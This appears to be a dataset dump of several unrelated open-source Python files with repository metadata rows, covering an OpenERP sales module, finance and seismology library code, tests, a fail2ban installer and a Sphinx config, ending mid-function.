uom = uom_obj.browse(cr, uid, vals.get('product_uom'))
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor)
})
if case.warehouse_id: # shop is nothing but company_id
context.update({'warehouse':case.warehouse_id.id})
# Commented for Pricelist Concept
if res.get('discount'):
vals.update({
'discount' : res.get('discount') and res.get('discount') or 0.00,
})
if res.get('price_unit') and prod_uom == line_uom:
vals.update({
'price_unit' : res.get('price_unit') and res.get('price_unit') or 0.00,
})
if res.get("price_unit") and prod_uom == line_uom:
vals.update({'price_unit':res.get("price_unit")})
if not vals.get('price_unit')or not res.get('price_unit'):
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (vals['name'],))
location_ids = loc_obj.search(cr, uid,[('company_id','=', company_id),('name','=','Stock')])
comp_id = vals.get("company_id",case.company_id)
if res.get("tax_id"):
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id.id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
if location_ids:
location_ids = location_ids[0]
product = vals.get('product_id', False)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid, vals.get("product_id",False))
vals.update({'available_qty' : available_qty and available_qty or 0,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price})
return super(sale_order_line, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if not context:
context = {}
if context and uid != context.get("uid",False):
uid = context.get("uid")
if not uid:
uid = SUPERUSER_ID
context = dict(context)
prodtemp_obj = self.pool.get("product.template")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
user_obj = self.pool.get("res.users")
uom_obj = self.pool.get("product.uom")
for case in self.browse(cr, uid, ids):
price_unit = vals.get('price_unit')
prod_id = vals.get("product_id", case.product_id.id)
prod = prod_obj.browse(cr, uid, [prod_id])
# prodtemp_id = prod_obj.browse(cr, uid,[prod.product_tmpl_id.id] )
pricelist_id = case.order_id.pricelist_id.id
context.update({'quantity':case.product_uom_qty or 1.0 })
context.update({'pricelist': pricelist_id or False})
context.update({'partner': case.order_id.partner_id.id or False})
# Calling This method update price_unit as Pricelist Price or Price After Discount or Sales Price
prodtemp = prodtemp_obj._product_template_price(cr, uid, [prod.product_tmpl_id.id], 'price', False, context=context)
price_unit = prodtemp[prod.product_tmpl_id.id]
if price_unit <=0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if not price_unit:
price_unit = case.price_unit
if price_unit <= 0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if price_unit:
vals.update({
'price_unit':price_unit
})
if vals.get('warehouse_id',case.order_id.warehouse_id.id): # shop is nothing but company_id
context.update({'warehouse':vals.get('warehouse_id',case.order_id.warehouse_id.id)})
product = vals.get('product_id', case.product_id.id)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid,[product])
vals.update({
'available_qty' : available_qty,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price
})
res = self.product_id_change_with_wh(cr, uid, [], case.order_id.pricelist_id.id,vals.get('product_id',case.product_id.id),vals.get('qty',0), vals.get('uom',case.product_uom.id), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.order_id.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.order_id.warehouse_id.id,context=context)['value']
# For Case of UOM
prod_uom = prod.uom_id.id
line_uom = vals.get('product_uom',case.product_uom.id)
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, line_uom)
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor),
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
})
if prod_uom == line_uom:
vals.update({
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
'price_unit': res.get("price_unit") and res.get("price_unit") or 1
})
if res.get("tax_id"):
comp_id = vals.get("company_id",case.company_id.id)
if res.get("company_id"):
comp_id = res.get("company_id", case.company_id)
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
return super(sale_order_line, self).write(cr, uid, [case.id], vals, context=context)
sale_order_line()
| agpl-3.0 | -6,004,310,348,129,873,000 | 47.130389 | 337 | 0.514135 | false |
google/tf-quant-finance | tf_quant_finance/experimental/pricing_platform/framework/market_data/volatility_surface_test.py | 1 | 4582 | # Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for rate_curve.py."""
from absl.testing import parameterized
import tensorflow.compat.v2 as tf
import tf_quant_finance as tff
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
volatility_surface = tff.experimental.pricing_platform.framework.market_data.volatility_surface
dateslib = tff.datetime
core = tff.experimental.pricing_platform.framework.core
InterpolationMethod = core.interpolation_method.InterpolationMethod
# This function can't be moved to SetUp since that would break graph mode
# execution
def build_surface(dim, default_interp=True):
dtype = tf.float64
year = dim * [[2021, 2022, 2023, 2025, 2050]]
month = dim * [[2, 2, 2, 2, 2]]
day = dim * [[8, 8, 8, 8, 8]]
expiries = tff.datetime.dates_from_year_month_day(year, month, day)
valuation_date = [(2020, 6, 24)]
strikes = dim * [[[1500, 1550, 1510],
[1500, 1550, 1510],
[1500, 1550, 1510],
[1500, 1550, 1510],
[1500, 1550, 1510]]]
volatilities = dim * [[[0.1, 0.12, 0.13],
[0.15, 0.2, 0.15],
[0.1, 0.2, 0.1],
[0.1, 0.2, 0.1],
[0.1, 0.1, 0.3]]]
interpolator = None
if not default_interp:
expiry_times = tf.cast(
tff.datetime.convert_to_date_tensor(
valuation_date).days_until(expiries), dtype=dtype) / 365.0
interpolator_obj = tff.math.interpolation.interpolation_2d.Interpolation2D(
expiry_times, tf.convert_to_tensor(strikes, dtype=dtype),
volatilities)
interpolator = interpolator_obj.interpolate
return volatility_surface.VolatilitySurface(
valuation_date, expiries, strikes, volatilities,
interpolator=interpolator, dtype=dtype)
@test_util.run_all_in_graph_and_eager_modes
class VolatilitySurfaceTest(tf.test.TestCase, parameterized.TestCase):
def test_volatility_1d(self):
vol_surface = build_surface(1)
expiry = tff.datetime.dates_from_tuples(
[(2020, 6, 16), (2021, 6, 1), (2025, 1, 1)])
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570]], expiry_dates=expiry.expand_dims(axis=0))
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1]], atol=1e-6)
def test_volatility_2d(self):
vol_surface = build_surface(2)
expiry = tff.datetime.dates_from_ordinals(
[[737592, 737942, 739252],
[737592, 737942, 739252]])
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570], [1525, 1505, 1570]], expiry_dates=expiry)
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1],
[0.14046875, 0.12300392, 0.1]], atol=1e-6)
def test_volatility_2d_interpolation(self):
"""Test using externally specified interpolator."""
vol_surface = build_surface(2, False)
expiry = tff.datetime.dates_from_ordinals(
[[737592, 737942, 739252],
[737592, 737942, 739252]])
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570], [1525, 1505, 1570]], expiry_dates=expiry)
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1],
[0.14046875, 0.12300392, 0.1]], atol=1e-6)
def test_volatility_2d_floats(self):
vol_surface = build_surface(2)
expiry = tff.datetime.dates_from_ordinals(
[[737592, 737942, 739252],
[737592, 737942, 739252]])
valuation_date = tff.datetime.convert_to_date_tensor([(2020, 6, 24)])
expiries = tf.cast(valuation_date.days_until(expiry),
dtype=vol_surface._dtype) / 365.0
vols = vol_surface.volatility(
strike=[[1525, 1400, 1570], [1525, 1505, 1570]],
expiry_times=expiries)
self.assertAllClose(
self.evaluate(vols),
[[0.14046875, 0.11547945, 0.1],
[0.14046875, 0.12300392, 0.1]], atol=1e-6)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | -7,667,539,642,388,929,000 | 37.830508 | 95 | 0.640986 | false |
BenProjex/ArchProject | chip/Memory.py | 1 | 2024 |
#!/usr/bin/python
WRITE = 1
READ = 0
###########################################################
#Don't worry about class Chip cuz Memory class use it only#
###########################################################
class Chip:
def __init__(self,name):
self.data = [0]*(2**12)
self.name =name;
#rdOrwr: 0 for read and 1 for write
def read8bit(self,address,data):
print("read data at chip: ",self.name," address [$", address,"] = $", self.data[address],".");
return self.data[address]
def write8bit(self,address,data):
print("Write $",data," to chip: ",self.name," address [$", address,"].");
self.data[address] = data
###############################################################
#Memory class will work as a real memory that will store #
#instruction pointer and data. #
#we can call memoryOp function to read or write data to memory
#
#exmple:
#m = Memory()
#m.memoryOp(4096,34,1) #memoryOp(address,data,rdOrwr)
#now rdOrwr(1bit) = 1 mean write to memory
#this call will write data(8bit) = 34 to address(16bit)=4096
#
#m.memoryOp(4096,34,0) #memoryOp(address,data,rdOrwr)
#now rdOrwr(1bit) = 0 mean read from memory
#notice: we won't use parameter data in this call.
#this call will read from memory address(16bit)=4096 and return#
#data(8bit) #
################################################################
class Memory:
def __init__(self):
self.chip = [Chip("U" + str(200+i)) for i in range(15)]
def memoryOp(self,address,data,rdOrwr):
if(address<=65535):
chipselect = address >> 12
chipaddr = address & 4095
if rdOrwr == WRITE:
self.chip[chipselect].write8bit(chipaddr,data)
elif rdOrwr == READ:
return self.chip[chipselect].read8bit(chipaddr,data)
else:
return None
else:
raise Exception('the address is overflow')
#temp = Memory();
#temp.memoryOp(5000,300,WRITE);
#print(temp.memoryOp(5000,300,READ)); | gpl-3.0 | -5,691,190,682,838,375,000 | 34.526316 | 98 | 0.551877 | false |
dr4ke616/pinky | twisted/plugins/node.py | 1 | 1334 | from zope.interface import implements
from twisted.python import usage
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
from pinky.node.service import NodeService
class Options(usage.Options):
optParameters = [
['port', None, None, 'The port number to listen on.'],
['host', None, None, 'The host address to bind to.'],
['broker_host', 'h', None, 'The broker host to connect to.'],
['broker_port', 'p', 43435, 'The broker port to connect to.']
]
optFlags = [
['debug', 'b', 'Enable/disable debug mode.']
]
class NodeServiceMaker(object):
implements(IServiceMaker, IPlugin)
tapname = "node"
description = "Startup an instance of the Pinky node"
options = Options
def makeService(self, options):
""" Construct a Node Server
"""
return NodeService(
port=options['port'],
host=options['host'],
broker_host=options['broker_host'],
broker_port=options['broker_port'],
debug=options['debug']
)
# Now construct an object which *provides* the relevant interfaces
# The name of this variable is irrelevant, as long as there is *some*
# name bound to a provider of IPlugin and IServiceMaker.
serviceMaker = NodeServiceMaker()
| mit | -2,104,320,416,493,700,000 | 28.644444 | 69 | 0.646927 | false |
jordanrinke/fusionpbx-installer | installers/fail2ban.py | 1 | 2492 | import shutil
import subprocess
import sys
import os
"""
FusionPBX
Version: MPL 1.1
The contents of this file are subject to the Mozilla Public License Version
1.1 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.mozilla.org/MPL/
Software distributed under the License is distributed on an "AS IS" basis,
WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
for the specific language governing rights and limitations under the
License.
The Initial Developer of the Original Code is
Jim Millard <[email protected]>
Portions created by the Initial Developer are Copyright (C) 2008-2016
the Initial Developer. All Rights Reserved.
Contributor(s):
Mark J. Crane <[email protected]>
"""
def ifail2ban(fpbxparms):
INSTALL_ROOT = os.getcwd()
if os.path.isfile("%s/resources/install.json" % (INSTALL_ROOT)):
fpbxparms.PARMS = fpbxparms.load_parms(fpbxparms.PARMS)
else:
print("Error no install parameters")
sys.exit(1)
print("Setting up fail2ban to protect your system from some types of attacks")
if os.path.isfile("%s/resources/fail2ban/jail.local" % (INSTALL_ROOT)):
if fpbxparms.whitelist != '':
shutil.copyfile("%s/resources/fail2ban/jail.package" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
else:
shutil.copyfile("%s/resources/fail2ban/jail.source" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
shutil.copyfile("%s/resources/fail2ban/freeswitch-dos.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/freeswitch-dos.conf")
shutil.copyfile("%s/resources/fail2ban/fusionpbx.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/fusionpbx.conf")
if fpbxparms.PARMS["FS_Install_Type"][0] == "P":
ftb = open("/etc/fail2ban/jail.local", 'a')
ftb.write("[DEFAULT]")
ftb.write("\n")
ftb.write("ignoreip = %s" % (fpbxparms.whitelist))
ftb.write("\n")
ftb.close()
ret = subprocess.call("systemctl restart fail2ban",
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
fpbxparms.check_ret(ret, "Restart fail2ban")
return
| mit | 6,252,150,104,698,604,000 | 39.852459 | 99 | 0.620385 | false |
shojikai/python-google-api-clients | test/test_bigquery_select.py | 1 | 2037 | import os
import re
import sys
import unittest
from pprint import pprint
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../')
from google_api_clients.bigquery import BigQuery
class BigQueryTest(unittest.TestCase):
def setUp(self):
self.project_id = os.getenv('PROJECT_ID')
self.dataset_id = os.getenv('DATASET_ID', 'test_dataset')
if self.project_id is None:
print('PROJECT_ID is not defined.')
sys.exit(1)
self.bq = BigQuery(self.project_id)
if self.bq.exists_dataset(self.dataset_id):
self.bq.drop_dataset(self.dataset_id, delete_contents=True)
self.bq.create_dataset(self.dataset_id)
self.bq.dataset_id = self.dataset_id # Set default datasetId
def TearDown(self):
self.bq.drop_dataset(self.dataset_id, delete_contents=True)
def test_normal_page_token(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare] '
res = self.bq.select(query, max_results=1)
self.assertEqual(10, len(res))
pprint(res)
def test_normal_empty(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare] ' \
+ 'WHERE corpus = "hoge" '
res = self.bq.select(query)
self.assertEqual(0, len(res))
pprint(res)
def test_normal_async(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare]'
res = self.bq.select(query, async=True)
self.assertTrue(re.match(r'job_', res))
pprint(res)
def test_normal(self):
query = 'SELECT TOP(corpus, 10) as title, COUNT(*) as unique_words ' \
+ 'FROM [publicdata:samples.shakespeare]'
res = self.bq.select(query)
self.assertEqual(10, len(res))
pprint(res)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -5,119,005,861,355,304,000 | 33.525424 | 78 | 0.609229 | false |
alirizakeles/tendenci | tendenci/apps/invoices/management/commands/update_inv_tb.py | 1 | 4500 | from django.core.management.base import BaseCommand, CommandError
class Command(BaseCommand):
def handle(self, *args, **options):
# command to run: python manage.py update_inv_tb
"""
This command will:
1) add the object_type field
2) populate the object_type field based on the content in invoice_object_type
3) drop field invoice_object_type
4) rename field invoice_object_type_id to object_id
"""
from django.db import connection, transaction
from django.contrib.contenttypes.models import ContentType
cursor = connection.cursor()
# add the object_type field
cursor.execute("ALTER TABLE invoices_invoice ADD object_type_id int AFTER guid")
transaction.commit_unless_managed()
print "Field object_type_id - Added"
# assign content type to object_type based on the invoice_object_type
try:
ct_make_payment = ContentType.objects.get(app_label='make_payments', model='MakePayment')
except:
ct_make_payment = None
try:
ct_donation = ContentType.objects.get(app_label='donations', model='Donation')
except:
ct_donation = None
try:
ct_job = ContentType.objects.get(app_label='jobs', model='Job')
except:
ct_job = None
try:
ct_directory = ContentType.objects.get(app_label='directories', model='Directory')
except:
ct_directory = None
try:
ct_event_registration = ContentType.objects.get(app_label='events', model='Registration')
except:
ct_event_registration = None
try:
ct_corp_memb = ContentType.objects.get(app_label='corporate_memberships', model='CorporateMembership')
except:
ct_corp_memb = None
if ct_make_payment:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='make_payment'
OR invoice_object_type='makepayments') """, [ct_make_payment.id])
transaction.commit_unless_managed()
if ct_donation:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='donation'
OR invoice_object_type='donations') """, [ct_donation.id])
transaction.commit_unless_managed()
if ct_job:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='job'
OR invoice_object_type='jobs') """, [ct_job.id])
transaction.commit_unless_managed()
if ct_directory:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='directory'
OR invoice_object_type='directories') """, [ct_directory.id])
transaction.commit_unless_managed()
if ct_event_registration:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='event_registration'
OR invoice_object_type='calendarevents') """, [ct_event_registration.id])
if ct_corp_memb:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='corporate_membership'
OR invoice_object_type='corporatememberships') """, [ct_corp_memb.id])
transaction.commit_unless_managed()
print "Field object_type_id - Populated"
# drop field invoice_object_type
cursor.execute("ALTER TABLE invoices_invoice DROP invoice_object_type")
transaction.commit_unless_managed()
print "Field invoice_object_type - Dropped"
# rename invoice_object_type_id to object_id
cursor.execute("ALTER TABLE invoices_invoice CHANGE invoice_object_type_id object_id int")
transaction.commit_unless_managed()
print "Renamed invoice_object_type to object_id"
print "done" | gpl-3.0 | 5,166,609,565,698,706,000 | 43.564356 | 114 | 0.560667 | false |
QuantumGhost/factory_boy | docs/conf.py | 1 | 8502 | # -*- coding: utf-8 -*-
#
# Factory Boy documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 15 23:51:15 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.dirname(os.path.abspath('.')))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
extlinks = {
'issue': ('https://github.com/FactoryBoy/factory_boy/issues/%s', 'issue #'),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Factory Boy'
copyright = u'2011-2015, Raphaël Barrois, Mark Sandstrom'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
root = os.path.abspath(os.path.dirname(__file__))
def get_version(*module_dir_components):
import re
version_re = re.compile(r"^__version__ = ['\"](.*)['\"]$")
module_root = os.path.join(root, os.pardir, *module_dir_components)
module_init = os.path.join(module_root, '__init__.py')
with open(module_init, 'r') as f:
for line in f:
match = version_re.match(line[:-1])
if match:
return match.groups()[0]
return '0.1.0'
# The full version, including alpha/beta/rc tags.
release = get_version('factory')
# The short X.Y version.
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
if 'READTHEDOCS_VERSION' in os.environ:
# Use the readthedocs version string in preference to our known version.
html_title = u"{} {} documentation".format(
project, os.environ['READTHEDOCS_VERSION'])
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'FactoryBoydoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'FactoryBoy.tex', u'Factory Boy Documentation',
u'Raphaël Barrois, Mark Sandstrom', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'factoryboy', u'Factory Boy Documentation',
[u'Raphaël Barrois, Mark Sandstrom'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'http://docs.python.org/': None,
'django': (
'http://docs.djangoproject.com/en/dev/',
'http://docs.djangoproject.com/en/dev/_objects/',
),
'sqlalchemy': (
'http://docs.sqlalchemy.org/en/rel_0_9/',
'http://docs.sqlalchemy.org/en/rel_0_9/objects.inv',
),
}
| mit | -6,028,333,616,958,771,000 | 32.070039 | 80 | 0.693729 | false |
eqcorrscan/ci.testing | eqcorrscan/utils/correlate.py | 1 | 12024 | """
Correlation functions for multi-channel cross-correlation of seismic data.
:copyright:
EQcorrscan developers.
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import ctypes
from multiprocessing import Pool
from scipy.fftpack.helper import next_fast_len
from eqcorrscan.utils.libnames import _load_cdll
def scipy_normxcorr(templates, stream, pads):
"""
Compute the normalized cross-correlation of multiple templates with data.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
import bottleneck
from scipy.signal.signaltools import _centered
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
# Currently have to use float64 as bottleneck runs into issues with other
# types: https://github.com/kwgoodman/bottleneck/issues/164
stream = stream.astype(np.float64)
templates = templates.astype(np.float64)
template_length = templates.shape[1]
stream_length = len(stream)
fftshape = next_fast_len(template_length + stream_length - 1)
# Set up normalizers
stream_mean_array = bottleneck.move_mean(
stream, template_length)[template_length - 1:]
stream_std_array = bottleneck.move_std(
stream, template_length)[template_length - 1:]
# Normalize and flip the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
norm_sum = norm.sum(axis=-1, keepdims=True)
stream_fft = np.fft.rfft(stream, fftshape)
template_fft = np.fft.rfft(np.flip(norm, axis=-1), fftshape, axis=-1)
res = np.fft.irfft(template_fft * stream_fft,
fftshape)[:, 0:template_length + stream_length - 1]
res = ((_centered(res, stream_length - template_length + 1)) -
norm_sum * stream_mean_array) / stream_std_array
res[np.isnan(res)] = 0.0
for i in range(len(pads)):
res[i] = np.append(res[i], np.zeros(pads[i]))[pads[i]:]
return res.astype(np.float32), used_chans
def multichannel_xcorr(templates, stream, cores=1, time_domain=False):
"""
Cross-correlate multiple channels either in parallel or not
:type templates: list
:param templates:
A list of templates, where each one should be an obspy.Stream object
containing multiple traces of seismic data and the relevant header
information.
:type stream: obspy.core.stream.Stream
:param stream:
A single Stream object to be correlated with the templates.
:type cores: int
:param cores:
Number of processed to use, if set to None, and dask==False, no
multiprocessing will be done.
:type cores: int
:param cores: Number of cores to loop over
:type time_domain: bool
:param time_domain:
Whether to compute in the time-domain using the compiled openMP
parallel cross-correlation routine.
:returns:
New list of :class:`numpy.ndarray` objects. These will contain
the correlation sums for each template for this day of data.
:rtype: list
:returns:
list of ints as number of channels used for each cross-correlation.
:rtype: list
:returns:
list of list of tuples of station, channel for all cross-correlations.
:rtype: list
.. Note::
Each template must contain the same channels as every other template,
the stream must also contain the same channels (note that if there
are duplicate channels in the template you do not need duplicate
channels in the stream).
"""
no_chans = np.zeros(len(templates))
chans = [[] for _i in range(len(templates))]
# Do some reshaping
stream.sort(['network', 'station', 'location', 'channel'])
t_starts = []
for template in templates:
template.sort(['network', 'station', 'location', 'channel'])
t_starts.append(min([tr.stats.starttime for tr in template]))
seed_ids = [tr.id + '_' + str(i) for i, tr in enumerate(templates[0])]
template_array = {}
stream_array = {}
pad_array = {}
for i, seed_id in enumerate(seed_ids):
t_ar = np.array([template[i].data
for template in templates]).astype(np.float32)
template_array.update({seed_id: t_ar})
stream_array.update(
{seed_id: stream.select(
id=seed_id.split('_')[0])[0].data.astype(np.float32)})
pad_list = [
int(round(template[i].stats.sampling_rate *
(template[i].stats.starttime - t_starts[j])))
for j, template in zip(range(len(templates)), templates)]
pad_array.update({seed_id: pad_list})
if cores is None:
cccsums = np.zeros([len(templates),
len(stream[0]) - len(templates[0][0]) + 1])
for seed_id in seed_ids:
if time_domain:
tr_xcorrs, tr_chans = time_multi_normxcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
else:
tr_xcorrs, tr_chans = fftw_xcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
cccsums = np.sum([cccsums, tr_xcorrs], axis=0)
no_chans += tr_chans.astype(np.int)
for chan, state in zip(chans, tr_chans):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
else:
pool = Pool(processes=cores)
if time_domain:
results = [pool.apply_async(time_multi_normxcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
else:
results = [pool.apply_async(fftw_xcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
pool.close()
results = [p.get() for p in results]
xcorrs = [p[0] for p in results]
tr_chans = np.array([p[1] for p in results])
pool.join()
cccsums = np.sum(xcorrs, axis=0)
no_chans = np.sum(tr_chans.astype(np.int), axis=0)
for seed_id, tr_chan in zip(seed_ids, tr_chans):
for chan, state in zip(chans, tr_chan):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
return cccsums, no_chans, chans
def time_multi_normxcorr(templates, stream, pads):
"""
